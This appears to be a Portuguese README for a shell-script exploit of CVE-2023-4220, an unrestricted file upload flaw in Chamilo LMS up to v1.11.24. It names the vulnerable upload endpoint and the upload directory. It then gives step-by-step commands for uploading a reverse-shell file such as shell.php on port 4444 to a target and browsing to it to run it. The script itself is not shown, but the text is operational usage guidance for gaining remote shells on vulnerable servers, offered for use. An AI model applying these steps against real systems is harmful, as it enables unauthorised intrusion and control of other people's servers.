
Exploração baseada em shell para CVE-2023-4220 visando upload de arquivo irrestrito no Chamilo LMS. Envia arquivos arbitrários para executar shells reversos em instâncias vulneráveis.
Este exploit demonstra uma vulnerabilidade de upload irrestrito de arquivos no Chamilo-LMS. A vulnerabilidade afeta a funcionalidade de upload de arquivos grandes localizada em:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
Versões Afetadas: Chamilo LMS <= v1.11.24
A vulnerabilidade permite que arquivos arbitrários sejam enviados para:
/main/inc/lib/javascript/bigupload/files/
Primeiro, torne o exploit executável e visualize as informações de uso:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
Execute o exploit com os parâmetros necessários:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
Verifique o arquivo enviado em:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f: Especifique o arquivo a ser enviado-h: URL do host de destino-p: Número da porta para conexão./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
A vulnerabilidade existe no mecanismo de upload de arquivos do Chamilo LMS, que falha em validar adequadamente os arquivos enviados na funcionalidade de upload de arquivos grandes.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/